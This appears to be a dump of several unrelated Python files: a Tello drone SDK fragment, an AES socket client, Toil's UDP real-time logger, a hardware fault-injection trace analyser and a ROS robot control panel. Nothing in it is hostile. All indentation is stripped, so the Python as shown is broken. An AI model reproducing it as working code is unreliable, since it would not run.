{'pitch': int, 'roll': int, 'yaw': int}
"""
response = self.send_read_command('attitude?')
return Tello.parse_state(response)
def query_barometer(self) -> int:
"""Get barometer value (cm)
Using get_barometer is usually faster.
Returns:
int: 0-100
"""
baro = self.send_read_command_int('baro?')
return baro * 100
def query_distance_tof(self) -> float:
"""Get distance value from TOF (cm)
Using get_distance_tof is usually faster.
Returns:
float: 30-1000
"""
# example response: 801mm
tof = self.send_read_command('tof?')
return int(tof[:-2]) / 10
def query_wifi_signal_noise_ratio(self) -> str:
"""Get Wi-Fi SNR
Returns:
str: snr
"""
return self.send_read_command('wifi?')
def query_sdk_version(self) -> str:
"""Get SDK Version
Returns:
str: SDK Version
"""
return self.send_read_command('sdk?')
def query_serial_number(self) -> str:
"""Get Serial Number
Returns:
str: Serial Number
"""
return self.send_read_command('sn?')
def end(self):
"""Call this method when you want to end the tello object
"""
if self.is_flying:
self.land()
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
host = self.address[0]
if host in drones:
del drones[host]
def __del__(self):
self.end()
class BackgroundFrameRead:
"""
This class read frames from a VideoCapture in background. Use
backgroundFrameRead.frame to get the current frame.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
self.grabbed, self.frame = self.cap.read()
if not self.grabbed or self.frame is None:
raise Exception('Failed to grab first frame from video stream')
self.stopped = False
self.worker = Thread(target=self.update_frame, args=(), daemon=True)
def start(self):
self.worker.start()
def update_frame(self):
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
self.grabbed, self.frame = self.cap.read()
def stop(self):
self.stopped = True
self.worker.join()
|
Client.py
|
import socket
from threading import Thread
from Crypto.Cipher import AES
class Client:
KEY_LEN = 16
AES_ECB_BLOCK_LEN = 16
REQUEST_PORTION = 2**10 * 8
def __init__(self, server_host, server_port):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.unencrypted = bytearray()
self.key = bytes()
self.decipher = None
self.socket.connect((server_host, server_port))
def start_client(self):
self.__get_key()
self.decipher = AES.new(self.key, AES.MODE_ECB)
Thread(target=self.__decrypt_loop).start()
def __get_key(self):
while len(self.key) != Client.KEY_LEN:
data = self.socket.recv(Client.KEY_LEN)
if len(data) > Client.KEY_LEN - len(self.key):
self.unencrypted += data[Client.KEY_LEN - len(self.key):]
self.key += data[:Client.KEY_LEN - len(self.key)]
else:
self.key += data
print('Out')
def __decrypt_loop(self):
while 1:
self.unencrypted += self.socket.recv(Client.REQUEST_PORTION)
data_length = len(self.unencrypted)
size_to_decrypt = data_length - data_length % Client.AES_ECB_BLOCK_LEN
decrypted_data = self.decipher.decrypt(self.unencrypted[:size_to_decrypt])
self.unencrypted = self.unencrypted[size_to_decrypt:]
self.socket.send(decrypted_data)
print('Work!')
|
realtimeLogger.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Implements a real-time UDP-based logging system that user scripts can use for debugging.
"""
from __future__ import absolute_import
import os
import os.path
import json
import logging
import logging.handlers
import socket
import threading
# Python 3 compatibility imports
from six.moves import socketserver as SocketServer
import toil.lib.bioio
log = logging.getLogger(__name__)
class LoggingDatagramHandler(SocketServer.BaseRequestHandler):
"""
Receive logging messages from the jobs and display them on the leader.
Uses bare JSON message encoding.
"""
def handle(self):
"""
Handle a single message. SocketServer takes care of splitting out the messages.
Messages are JSON-encoded logging module records.
"""
# Unpack the data from the request
data, socket = self.request
try:
# Parse it as JSON
message_attrs = json.loads(data)
# Fluff it up into a proper logging record
record = logging.makeLogRecord(message_attrs)
except:
# Complain someone is sending us bad logging data
logging.error("Malformed log message from {}".format(self.client_address[0]))
else:
# Log level filtering should have been done on the remote end. The handle() method
# skips it on this end.
log.handle(record)
class JSONDatagramHandler(logging.handlers.DatagramHandler):
"""
Send logging records over UDP serialized as JSON.
They have to fit in a single UDP datagram, so don't try to log more than 64kb at once.
"""
def makePickle(self, record):
"""
Actually, encode the record as bare JSON instead.
"""
return json.dumps(record.__dict__)
class RealtimeLoggerMetaclass(type):
"""
Metaclass for RealtimeLogger that lets you do things like RealtimeLogger.warning(),
RealtimeLogger.info(), etc.
"""
def __getattr__(self, name):
"""
If a real attribute can't be found, try one of the logging methods on the actual logger
object.
"""
return getattr(self.getLogger(), name)
class RealtimeLogger(object):
"""
Provides a logger that logs over UDP to the leader. To use in a Toil job, do:
>>> from toil.realtimeLogger import RealtimeLogger
>>> RealtimeLogger.info("This logging message goes straight to the leader")
That's all a user of Toil would need to do. On the leader, Job.Runner.startToil()
automatically starts the UDP server by using an instance of this class as a context manager.
"""
# Enable RealtimeLogger.info() syntactic sugar
__metaclass__ = RealtimeLoggerMetaclass
# The names of all environment variables used by this class are prefixed with this string
envPrefix = "TOIL_RT_LOGGING_"
# Avoid duplicating the default level everywhere
defaultLevel = 'INFO'
# State maintained on server and client
lock = threading.RLock()
# Server-side state
# The leader keeps a server and thread
loggingServer = None
serverThread = None
initialized = 0
# Client-side state
logger = None
@classmethod
def _startLeader(cls, batchSystem, level=defaultLevel):
with cls.lock:
if cls.initialized == 0:
cls.initialized += 1
if level:
log.info('Starting real-time logging.')
# Start up the logging server
cls.loggingServer = SocketServer.ThreadingUDPServer(
server_address=('0.0.0.0', 0),
RequestHandlerClass=LoggingDatagramHandler)
# Set up a thread to do all the serving in the background and exit when we do
cls.serverThread = threading.Thread(target=cls.loggingServer.serve_forever)
cls.serverThread.daemon = True
cls.serverThread.start()
# Set options for logging in the environment so they get sent out to jobs
fqdn = socket.getfqdn()
try:
ip = socket.gethostbyname(fqdn)
except socket.gaierror:
# FIXME: Does this only happen for me? Should we librarize the work-around?
import platform
if platform.system() == 'Darwin' and '.' not in fqdn:
ip = socket.gethostbyname(fqdn + '.local')
else:
raise
port = cls.loggingServer.server_address[1]
def _setEnv(name, value):
name = cls.envPrefix + name
os.environ[name] = value
batchSystem.setEnv(name)
_setEnv('ADDRESS', '%s:%i' % (ip, port))
_setEnv('LEVEL', level)
else:
log.info('Real-time logging disabled')
else:
if level:
log.warn('Ignoring nested request to start real-time logging')
@classmethod
def _stopLeader(cls):
"""
Stop the server on the leader.
"""
with cls.lock:
assert cls.initialized > 0
cls.initialized -= 1
if cls.initialized == 0:
if cls.loggingServer:
log.info('Stopping real-time logging server.')
cls.loggingServer.shutdown()
cls.loggingServer = None
if cls.serverThread:
log.info('Joining real-time logging server thread.')
cls.serverThread.join()
cls.serverThread = None
for k in os.environ.keys():
if k.startswith(cls.envPrefix):
os.environ.pop(k)
@classmethod
def getLogger(cls):
"""
Get the logger that logs real-time to the leader.
Note that if the returned logger is used on the leader, you will see the message twice,
since it still goes to the normal log handlers, too.
"""
# Only do the setup once, so we don't add a handler every time we log. Use a lock to do
# so safely even if we're being called in different threads. Use double-checked locking
# to reduce the overhead introduced by the lock.
if cls.logger is None:
with cls.lock:
if cls.logger is None:
cls.logger = logging.getLogger('toil-rt')
try:
level = os.environ[cls.envPrefix + 'LEVEL']
except KeyError:
# There is no server running on the leader, so suppress most log messages
# and skip the UDP stuff.
cls.logger.setLevel(logging.CRITICAL)
else:
# Adopt the logging level set on the leader.
toil.lib.bioio.setLogLevel(level, cls.logger)
try:
address = os.environ[cls.envPrefix + 'ADDRESS']
except KeyError:
pass
else:
# We know where to send messages to, so send them.
host, port = address.split(':')
cls.logger.addHandler(JSONDatagramHandler(host, int(port)))
return cls.logger
def __init__(self, batchSystem, level=defaultLevel):
"""
A context manager that starts up the UDP server.
Should only be invoked on the leader. Python logging should have already been configured.
This method takes an optional log level, as a string level name, from the set supported
by bioio. If the level is None, False or the empty string, real-time logging will be
disabled, i.e. no UDP server will be started on the leader and log messages will be
suppressed on the workers. Note that this is different from passing level='OFF',
which is equivalent to level='CRITICAL' and does not disable the server.
"""
super(RealtimeLogger, self).__init__()
self.__level = level
self.__batchSystem = batchSystem
def __enter__(self):
RealtimeLogger._startLeader(self.__batchSystem, level=self.__level)
# noinspection PyUnusedLocal
def __exit__(self, exc_type, exc_val, exc_tb):
RealtimeLogger._stopLeader()
|
SBFI_Analyzer.py
|
# Multithreaded analysis of observation dumps (from toolconf.result_dir)
# Interacts with datamodel
# With respect to SQL database - fills the table 'Injections'
# Renames dumps according to global unique key, stores them into zip package
# Author: Ilya Tuzov, Universitat Politecnica de Valencia
import sys
import xml.etree.ElementTree as ET
import re
import os
import stat
import subprocess
import shutil
import datetime
import time
import random
import glob
import threading
from threading import Thread
from Davos_Generic import *
from Datamanager import *
EnhancedAnalysisOfLatentErrors = False
def check_outputs(ref_trace, inj_trace, time_window, mode, max_time_violation):
"""
Locates mismatches on DUT outputs (any mismatch is treated as DUT failure)
Args:
mode ():
ref_trace ():
inj_trace ():
time_window ():
Returns:
dictionary: key='DomainLabel', val= [number of mismatches, time of first mismatch]
"""
res = dict((k, [0, None]) for k in ref_trace.domain_indices.keys())
time_points = sorted(list(set([i.time for i in ref_trace.vectors + inj_trace.vectors
if (i.time >= time_window[0])])))
if mode == TraceCheckModes.MAV:
for t in time_points:
ref_v = ref_trace.get_vector_by_time(t, None)
inj_v = inj_trace.get_vector_by_time(t, None)
for k, v in ref_trace.domain_indices.items():
for i in v:
if ref_v.outputs[i] != inj_v.outputs[i]:
res[k][0] += 1
if res[k][1] is None:
res[k][1] = t
break
elif mode == TraceCheckModes.MLV and len(time_points) > 0:
ref_v = ref_trace.get_vector_by_time(time_points[-1], None)
inj_v = inj_trace.get_vector_by_time(time_points[-1], None)
for k, v in ref_trace.domain_indices.items():
for i in v:
if ref_v.outputs[i] != inj_v.outputs[i]:
res[k][0] = 1
res[k][1] = time_points[-1]
break
return res
def check_tmr(ref_trace, inj_trace, time_window, mode, max_time_violation):
if len(ref_trace.domain_indices.keys()) < 3:
print('SBFI analyzer error: number of domains ({0}) is less than required for TMR')
return None
time_points = sorted(list(set([i.time for i in ref_trace.vectors + inj_trace.vectors
if (i.time >= time_window[0])])))
ref_v = ref_trace.get_vector_by_time(time_points[-1], None)
inj_v = inj_trace.get_vector_by_time(time_points[-1], None)
tmr_match = True
m1, m2, m3 = 0, 0, 0
t1, t2, t3 = None, None, None
domains = sorted(ref_trace.domain_indices.keys())
rsize = len(ref_trace.domain_indices[domains[0]])
for item_id in range(rsize):
i1, i2, i3 = ref_trace.domain_indices[domains[0]][item_id], ref_trace.domain_indices[domains[1]][item_id], ref_trace.domain_indices[domains[2]][item_id]
h1, h2, h3 = int(inj_v.outputs[i1], 16), int(inj_v.outputs[i2], 16), int(inj_v.outputs[i3], 16)
if h1 != int(ref_v.outputs[i1], 16):
m1 += 1
if t1 is None: t1 = time_points[-1]
if h2 != int(ref_v.outputs[i2], 16):
m2 += 1
if t2 is None: t2 = time_points[-1]
if h3 != int(ref_v.outputs[i3], 16):
m3 += 1
if t3 is None: t3 = time_points[-1]
voted = (h1 & h2) | (h1 & h3) | (h2 & h3)
if voted != int(ref_v.outputs[i1], 16):
tmr_match = False
return {domains[0]: (m1, t1), domains[1]: (m2, t2), domains[2]: (m3, t3)}, tmr_match
def count_latent_errors(ref_trace, inj_trace, time_window):
mismatches = 0
# time_points = sorted(list(set([i.time for i in ref_trace.vectors + inj_trace.vectors
# if (i.time >= time_window[0]) and (i.time <= time_window[1])])))
time_points = sorted(list(set([i.time for i in ref_trace.vectors + inj_trace.vectors
if (i.time >= time_window[0])])))
if len(time_points) > 0:
ref_v = ref_trace.get_vector_by_time(time_points[-1], None)
inj_v = inj_trace.get_vector_by_time(time_points[-1], None)
for i in range(len(ref_v.internals)):
if ref_v.internals[i] != inj_v.internals[i]:
mismatches += 1
return mismatches
def process_dumps_in_linst(config, toolconf, conf, datamodel, DescItems, baseindex):
model = datamodel.GetHdlModel(conf.label)
basetime = datamodel.reference.reference_dump.vectors[-1].time - conf.workload_time
ExpDescIdCnt = baseindex
tw = config.SBFI.analyzer.time_window if config.SBFI.analyzer.time_window is not None else (datamodel.reference.reference_dump.vectors[0].time, datamodel.reference.reference_dump.vectors[-1].time)
print("Analysis of traces, time window: {0}".format(str(tw)))
err_signal_index = None, None
if config.SBFI.analyzer.error_flag_signal != '':
if '{{{0}}}'.format(config.SBFI.analyzer.error_flag_signal) in datamodel.reference.reference_dump.internal_labels:
err_signal_index = 0, datamodel.reference.reference_dump.internal_labels.index('{{{0}}}'.format(config.SBFI.analyzer.error_flag_signal))
elif '{{{0}}}'.format(config.SBFI.analyzer.error_flag_signal) in datamodel.reference.reference_dump.output_labels:
err_signal_index = 1, datamodel.reference.reference_dump.output_labels.index('{{{0}}}'.format(config.SBFI.analyzer.error_flag_signal))
for item in DescItems:
if ExpDescIdCnt % 10 == 0:
sys.stdout.write("\r%s: Processing dump: %6i" % (conf.label, ExpDescIdCnt))
sys.stdout.flush()
target = datamodel.GetOrAppendTarget(item.target, item.instance_type, item.injection_case)
InjDesc = InjectionDescriptor()
InjDesc.ID = ExpDescIdCnt
InjDesc.ModelID = model.ID
InjDesc.TargetID = target.ID
InjDesc.FaultModel = item.fault_model
InjDesc.ForcedValue = item.forced_value
InjDesc.InjectionTime = item.injection_time
InjDesc.InjectionDuration = item.duration
InjDesc.ObservationTime = item.observation_time
InjDesc.Node = item.target
InjDesc.InjCase = item.injection_case
InjDesc.DomainMatch = {}
for k in datamodel.reference.reference_dump.domain_indices.keys():
InjDesc.DomainMatch[k] = '-'
inj_dump = simDump()
inj_dump.set_labels_copy(datamodel.reference.initial_internal_labels, datamodel.reference.initial_output_labels)
if inj_dump.build_vectors_from_file(os.path.join(conf.work_dir, toolconf.result_dir, item.dumpfile)) == None:
InjDesc.Status = 'E' # error
else:
InjDesc.Status = 'S' # Simulation successful and dumpfile exists
err_raised = False
if err_signal_index[0] is not None:
for v in inj_dump.vectors:
if err_signal_index[0] == 0:
if v.internals[err_signal_index[1]] == config.SBFI.analyzer.error_flag_active_value:
err_raised = True
break
elif err_signal_index[0] == 1:
if v.outputs[err_signal_index[1]] == config.SBFI.analyzer.error_flag_active_value:
err_raised = True
break
InjDesc.ErrorCount = count_latent_errors(datamodel.reference.reference_dump, inj_dump, tw)
InjDesc.FaultToFailureLatency = float(0)
if config.SBFI.analyzer.domain_mode.upper() in ['', 'SIMPLEX']:
output_match_res = check_outputs(datamodel.reference.reference_dump, inj_dump, tw, config.SBFI.analyzer.mode, config.SBFI.analyzer.max_time_violation)
for k, v in output_match_res.items():
InjDesc.DomainMatch[k] = 'V' if v[0] == 0 else 'X'
out_misnum = sum(v[0] for k, v in output_match_res.items())
if out_misnum > 0:
first_mismatch = min(v[1] for k, v in output_match_res.items() if v[1] is not None)
InjDesc.FaultToFailureLatency = first_mismatch - basetime - float(InjDesc.InjectionTime)
if InjDesc.FaultToFailureLatency < 0: InjDesc.FaultToFailureLatency = float(0)
# Determine failure mode
if out_misnum == 0:
if InjDesc.ErrorCount == 0:
InjDesc.FailureMode = 'M' # Masked fault
else:
InjDesc.FailureMode = 'L' # Latent fault
else:
if err_raised:
InjDesc.FailureMode = 'S' # Signaled Failure
else:
InjDesc.FailureMode = 'C' # Silent Data Corruption
elif config.SBFI.analyzer.domain_mode.upper() in ['TMR']:
output_match_res, tmr_match = check_tmr(datamodel.reference.reference_dump, inj_dump, tw, config.SBFI.analyzer.mode, config.SBFI.analyzer.max_time_violation)
for k, v in output_match_res.items():
InjDesc.DomainMatch[k] = 'V' if v[0] == 0 else 'X'
if not tmr_match:
InjDesc.FailureMode = 'C'
first_mismatch = min(v[1] for k, v in output_match_res.items() if v[1] is not None)
InjDesc.FaultToFailureLatency = first_mismatch - basetime - float(InjDesc.InjectionTime)
elif sum(i == 'V' for i in InjDesc.DomainMatch.values()) < 3:
InjDesc.FailureMode = 'L' # Latent fault
else:
InjDesc.FailureMode = 'M' # Masked fault
# rename dumpfile to string of unique index {InjDesc.ID}.lst
InjDesc.Dumpfile = '{0:010d}.lst'.format(InjDesc.ID)
src = os.path.normpath(os.path.join(conf.work_dir, toolconf.result_dir, item.dumpfile))
dst = os.path.normpath(os.path.join(conf.work_dir, 'irespack', InjDesc.Dumpfile))
if os.path.exists(src): shutil.copy(src, dst)
datamodel.LaunchedInjExp_dict[InjDesc.ID] = InjDesc
ExpDescIdCnt += 1
def process_dumps(config, toolconf, conf, datamodel):
timestart = datetime.datetime.now().replace(microsecond=0)
os.chdir(conf.work_dir)
packdir = os.path.join(conf.work_dir, 'irespack')
if os.path.exists(packdir): shutil.rmtree(packdir)
os.mkdir(packdir)
shutil.copy(os.path.normpath(os.path.join(conf.work_dir, toolconf.result_dir, toolconf.reference_file)), os.path.normpath(os.path.join(packdir, toolconf.reference_file)))
datamodel.reference.reference_dump = simDump()
datamodel.reference.reference_dump.build_labels_from_file(os.path.normpath(os.path.join(conf.work_dir, toolconf.list_init_file)), config.SBFI.analyzer.rename_list)
datamodel.reference.reference_dump.normalize_array_labels(os.path.normpath(os.path.join(conf.work_dir, toolconf.result_dir, toolconf.reference_file)))
datamodel.reference.reference_dump.build_vectors_from_file(os.path.normpath(os.path.join(conf.work_dir, toolconf.result_dir, toolconf.reference_file)))
datamodel.reference.initial_internal_labels, datamodel.reference.initial_output_labels = datamodel.reference.reference_dump.get_labels_copy()
datamodel.reference.JnGrLst = config.SBFI.analyzer.join_group_list.copy()
datamodel.reference.reference_dump.join_output_columns(datamodel.reference.JnGrLst.copy())
desctable = ExpDescTable(conf.label)
desctable.build_from_csv_file(os.path.normpath(os.path.join(conf.work_dir, toolconf.result_dir, toolconf.exp_desc_file)), "Other")
print('Processing simulation traces')
progress = 0
for i in desctable.items:
target = datamodel.GetOrAppendTarget(i.target, i.instance_type, i.injection_case)
progress += 1
if progress % 100 == 0:
sys.stdout.write('Targets appended: {0:06d}\r'.format(progress))
# Prepare multithreaded analysis of dumps
threadnum = config.SBFI.analyzer.threads
ExpDescIdCnt = datamodel.GetMaxKey(DataDescriptors.InjectionExp) + 1
threadlist = []
step = (len(desctable.items) / threadnum) + 1
index = 0
while index < len(desctable.items):
if index + step <= len(desctable.items):
items = desctable.items[index:index + step]
else:
items = desctable.items[index:]
baseindex = ExpDescIdCnt + index
print('Starting analysis thread: {0} + {1}'.format(str(baseindex), str(len(items))))
t = Thread(target=process_dumps_in_linst, args=(config, toolconf, conf, datamodel, items, baseindex))
threadlist.append(t)
index += step
for t in threadlist:
t.start()
for t in threadlist:
t.join()
datamodel.SaveTargets()
datamodel.SaveInjections()
injsummary = datamodel.LaunchedInjExp_dict.values()
domains = sorted(injsummary[0].DomainMatch.keys())
T = Table('SummaryFaultSim', ['Node', 'InjCase', 'InjTime', 'Duration', 'FailureMode'] + domains)
for i in range(len(injsummary)):
T.add_row()
T.put(i, T.labels.index('Node'), injsummary[i].Node)
T.put(i, T.labels.index('InjCase'), injsummary[i].InjCase)
T.put(i, T.labels.index('InjTime'), injsummary[i].InjectionTime)
T.put(i, T.labels.index('Duration'), injsummary[i].InjectionDuration)
T.put(i, T.labels.index('FailureMode'), injsummary[i].FailureMode)
for k in domains:
T.put(i, T.labels.index(k), injsummary[i].DomainMatch[k])
with open(os.path.join(config.report_dir, 'Summary_{0}_{1}.csv'.format(config.experiment_label, conf.label)), 'w') as f:
f.write(T.to_csv())
datamodel.LaunchedInjExp_dict.clear()
dumppack = "RESPACK_{0}.zip".format(conf.label)
os.chdir(conf.work_dir)
zip_folder(packdir, os.path.join(config.report_dir, dumppack))
zip_folder(toolconf.code_dir, os.path.join(config.report_dir, dumppack))
shutil.rmtree(packdir)
domain_stats = {}
valid_exp = sum(i.Status == 'S' for i in injsummary)
failures = sum(i.FailureMode == 'C' for i in injsummary)
for i in range(len(injsummary)):
for k in domains:
if k not in domain_stats:
domain_stats[k] = 0
if injsummary[i].DomainMatch[k] == 'X':
domain_stats[k] += 1
with open(os.path.join(config.report_dir, 'Statistics.log'), 'a') as f:
f.write('\n{0:30s}: Failures: {1:5d}/{2:5d}: {3}'.format(conf.label,
failures, valid_exp,
'; '.join(['{0:10s}:{1:5d}'.format(k, domain_stats[k]) for k in sorted(domain_stats.keys())])))
print('\n\nAnalysys completed, time taken: ' + str(time_to_seconds(datetime.datetime.now().replace(microsecond=0) - timestart)))
|
rosnode_meridim_demo_dpg.py
|
# #!/usr/bin/python3
# coding: UTF-8
#もしくは #!/usr/bin/env python など環境に合わせて
#from _typeshed import IdentityFunction
from re import I
from yaml.tokens import TagToken
import rospy
from sensor_msgs.msg import JointState
import numpy as np
import socket
from contextlib import closing
import struct
import math
import dearpygui.dearpygui as dpg
import threading
import signal
UDP_RESV_IP="192.168.1.xx" #このPCのIPアドレス
UDP_RESV_PORT=22222 #受信ポート
UDP_SEND_IP="192.168.1.xx" #送信先のESP32のIPアドレス
UDP_SEND_PORT=22224 #送信ポート
MSG_SIZE = 90
MSG_BUFF = MSG_SIZE * 2
UPDATE_YAW_CENTER_FLAG = 0
UPDATE_YAW_CENTER_NUM = 102
sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)#UDP用のsocket設定
sock.bind((UDP_RESV_IP,UDP_RESV_PORT))
data2 = []
loop_count = 0
error_count = 0
flag_stop = 0
r_short_data_disp=list(range(MSG_SIZE))
message0 = "This PC's IP adress is "+UDP_RESV_IP
message1 = ""
button = "button"
def main():
global message
global message0
global message1
while not rospy.is_shutdown():
message1 = "Waiting for UDP data from "+UDP_SEND_IP+"..."
with closing(sock):
while True:
global loop_count
global r_short_data_disp
loop_count += 1
r_bin_data,addr = sock.recvfrom(1472)
#sock.sendto(r_bin_data,(UDP_SEND_IP,UDP_SEND_PORT))
r_short_data=struct.unpack('90h',r_bin_data)
#print(r_short_data)
message1 = "UDP data receiving from "+UDP_SEND_IP+"."
checksum = np.array([0], dtype=np.int16)
for i in range(MSG_SIZE-2):
checksum[0] += r_short_data[i]
r_short_data_disp[i]=r_short_data[i]
checksum[0] = ~checksum[0] & 0xffff
#print("[Calc] ",checksum[0])
#print("[Ans ] ",r_short_data[MSG_SIZE-1])
#r_short_data[MSG_SIZE-1]=checksum[0]
if checksum[0] == r_short_data[MSG_SIZE-1]:
joint_pub = rospy.Publisher('joint_states', JointState, queue_size=10)
rospy.init_node('joint_state_publisher_meridim')
rate = rospy.Rate(500) # 500hz
js_meridim = JointState()
js_meridim.header.stamp = rospy.Time.now()
js_meridim.name = ['c_chest_yaw', 'l_shoulder_pitch', 'l_shoulder_roll', 'l_elbow_yaw', 'l_elbow_pitch', 'l_hipjoint_yaw', 'l_hipjoint_roll', 'l_hipjoint_pitch', 'l_knee_pitch', 'l_ankle_pitch', 'l_ankle_roll', 'c_head_yaw', 'r_shoulder_pitch', 'r_shoulder_roll', 'r_elbow_yaw', 'r_elbow_pitch', 'r_hipjoint_yaw', 'r_hipjoint_roll', 'r_hipjoint_pitch', 'r_knee_pitch', 'r_ankle_pitch', 'r_ankle_roll']
js_meridim.position = [math.radians(r_short_data[21]/100), math.radians(r_short_data[23]/100), math.radians(r_short_data[25]/100), math.radians(r_short_data[27]/100), math.radians(r_short_data[29]/100), math.radians(r_short_data[31]/100), math.radians(r_short_data[33]/100), math.radians(r_short_data[35]/100), math.radians(r_short_data[37]/100), math.radians(r_short_data[39]/100), math.radians(r_short_data[41]/100), math.radians(r_short_data[51]/100), math.radians(r_short_data[53]/100), -math.radians(r_short_data[55]/100), -math.radians(r_short_data[57]/100), math.radians(r_short_data[59]/100), -math.radians(r_short_data[61]/100), -math.radians(r_short_data[63]/100), math.radians(r_short_data[65]/100), math.radians(r_short_data[67]/100), math.radians(r_short_data[69]/100), -math.radians(r_short_data[71]/100)]
js_meridim.velocity = []
#js_meridim.velocity = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
js_meridim.effort = []
joint_pub.publish(js_meridim)
rate.sleep()
else:
global error_count
error_count += 1
signal.signal(signal.SIGINT, signal.SIG_DFL)
#print("COUNT:",loop_count," ERROR:",error_count," ErrorRate:",'{:.02f}'.format(error_count/loop_count*100),"%")
#print("PAD:",r_short_data_disp[80])
#ここでデータを作成する
s_short_data=[]
s_short_data=list(r_short_data)
global UPDATE_YAW_CENTER_FLAG
#global UPDATE_YAW_CENTER_NUM
if (UPDATE_YAW_CENTER_FLAG ==1):
UPDATE_YAW_CENTER_FLAG = 0
s_short_data[0] = UPDATE_YAW_CENTER_NUM
#s_short_data[0]=102#テスト用ダミーデータ
checksum[0] = 0
for i in range(MSG_SIZE-2):
checksum[0] += s_short_data[i]
checksum[0] = ~checksum[0] & 0xffff
s_short_data[MSG_SIZE-1]=checksum[0]
s_bin_data=struct.pack('90h',*s_short_data)
#r_bin_data,addr = sock.recvfrom(1472)
#sock.sendto(r_bin_data,(UDP_SEND_IP,UDP_SEND_PORT))
#r_short_data=struct.unpack('90h',s_bin_data)
sock.sendto(s_bin_data,(UDP_SEND_IP,UDP_SEND_PORT))
#sock.sendto(r_bin_data,(UDP_SEND_IP,UDP_SEND_PORT))
def dpgrun():
def set_yaw_center():
global UPDATE_YAW_CENTER_FLAG
UPDATE_YAW_CENTER_FLAG = 1
print("Clicked!")#ターミナルにClicked!と表示する
dpg.create_context()
dpg.create_viewport(title='Meridian Control Panel DPG', width=600, height=480)
with dpg.window(label="Axis Monitor", width=250, height=350,pos=[5,5]):
with dpg.group(label='LeftSide'):
for i in range(0, 15, 1):
dpg.add_slider_float(default_value=0, tag="ID L"+str(i),label="L"+str(i),max_value=100,min_value=-100,pos=[10,35+i*20], width=80)
with dpg.group(label='RightSide'):
for i in range(0, 15, 1):
dpg.add_slider_float(default_value=0, tag="ID R"+str(i),label="R"+str(i),max_value=100,min_value=-100,pos=[135,35+i*20], width=80)
with dpg.window(label="Messege", width=590, height=115,pos=[5,360]):
dpg.add_text(message0,tag="DispMessage0")
dpg.add_text(message1,tag="DispMessage")
with dpg.window(label="Sensor Monitor", width=335, height=175,pos=[260,5]):
with dpg.group(label='LeftSide'):
dpg.add_slider_float(default_value=0, tag="mpu0", label="ac_x",max_value=327,min_value=-327,pos=[10,35], width=60)
dpg.add_slider_float(default_value=0, tag="mpu1", label="ac_y",max_value=327,min_value=-327,pos=[115,35], width=60)
dpg.add_slider_float(default_value=0, tag="mpu2", label="ac_z",max_value=327,min_value=-327,pos=[220,35], width=60)
dpg.add_slider_float(default_value=0, tag="mpu3", label="gr_x",max_value=327,min_value=-327,pos=[10,55], width=60)
dpg.add_slider_float(default_value=0, tag="mpu4", label="gr_y",max_value=327,min_value=-327,pos=[115,55], width=60)
dpg.add_slider_float(default_value=0, tag="mpu5", label="gr_z",max_value=327,min_value=-327,pos=[220,55], width=60)
dpg.add_slider_float(default_value=0, tag="mpu6", label="mg_x",max_value=327,min_value=-327,pos=[10,75], width=60)
dpg.add_slider_float(default_value=0, tag="mpu7", label="mg_y",max_value=327,min_value=-327,pos=[115,75], width=60)
dpg.add_slider_float(default_value=0, tag="mpu8", label="mg_z",max_value=327,min_value=-327,pos=[220,75], width=60)
dpg.add_slider_float(default_value=0, tag="mpu9", label="temp",max_value=327,min_value=-327,pos=[10,95], width=60)
dpg.add_slider_float(default_value=0, tag="mpu10", label="rol",max_value=327,min_value=-327,pos=[10,120], width=60)
dpg.add_slider_float(default_value=0, tag="mpu11", label="pit",max_value=327,min_value=-327,pos=[115,120], width=60)
dpg.add_slider_float(default_value=0, tag="mpu12", label="yaw",max_value=327,min_value=-327,pos=[220,120], width=60)
dpg.add_button(label="SetYaw", callback=set_yaw_center, width =50, pos=[270,148])
with dpg.window(label="Command", width=335, height=170,pos=[260,185]):
dpg.add_text("Control Pad Monitor", pos=[10,100])
dpg.add_text("button",tag="pad_button", pos=[170,100])
dpg.add_slider_int(default_value=0, tag="pad_Lx", label="Lx",max_value=127,min_value=-127, pos=[10,120], width=40)
dpg.add_slider_int(default_value=0, tag="pad_Ly", label="Ly",max_value=127,min_value=-127, pos=[90,120], width=40)
dpg.add_slider_int(default_value=0, tag="pad_Rx", label="Rx",max_value=127,min_value=-127, pos=[170,120], width=40)
dpg.add_slider_int(default_value=0, tag="pad_Ry", label="Ry",max_value=127,min_value=-127, pos=[250,120], width=40)
dpg.add_slider_int(default_value=0, tag="pad_L2v", label="L2v",max_value=255,min_value=0, pos=[90,140], width=40)
dpg.add_slider_int(default_value=0, tag="pad_R2v", label="R2v",max_value=255,min_value=0, pos=[170,140], width=40)
dpg.setup_dearpygui()
dpg.show_viewport()
while dpg.is_dearpygui_running():
for i in range(0, 15, 1):
global button
idld = r_short_data_disp[21+i*2]
idrd = r_short_data_disp[51+i*2]
idsensor = r_short_data_disp[i+2]/100
dpg.set_value("ID L"+str(i), idld/100)
dpg.set_value("ID R"+str(i), idrd/100)
dpg.set_value("DispMessage0", message0)
dpg.set_value("DispMessage", message1)
if i < 13:
dpg.set_value("mpu"+str(i),idsensor)
dpg.set_value("pad_button", str(r_short_data_disp[80]))
dpg.set_value("pad_Lx",-(r_short_data_disp[81]>>8&0x00ff & 0b10000000) | (r_short_data_disp[81]>>8&0x00ff & 0b01111111))
dpg.set_value("pad_Ly", -(r_short_data_disp[81]&0x00ff & 0b10000000) | (r_short_data_disp[81]&0x00ff & 0b01111111))
dpg.set_value("pad_Rx", -(r_short_data_disp[82]>>8&0x00ff & 0b10000000) | (r_short_data_disp[82]>>8&0x00ff & 0b01111111))
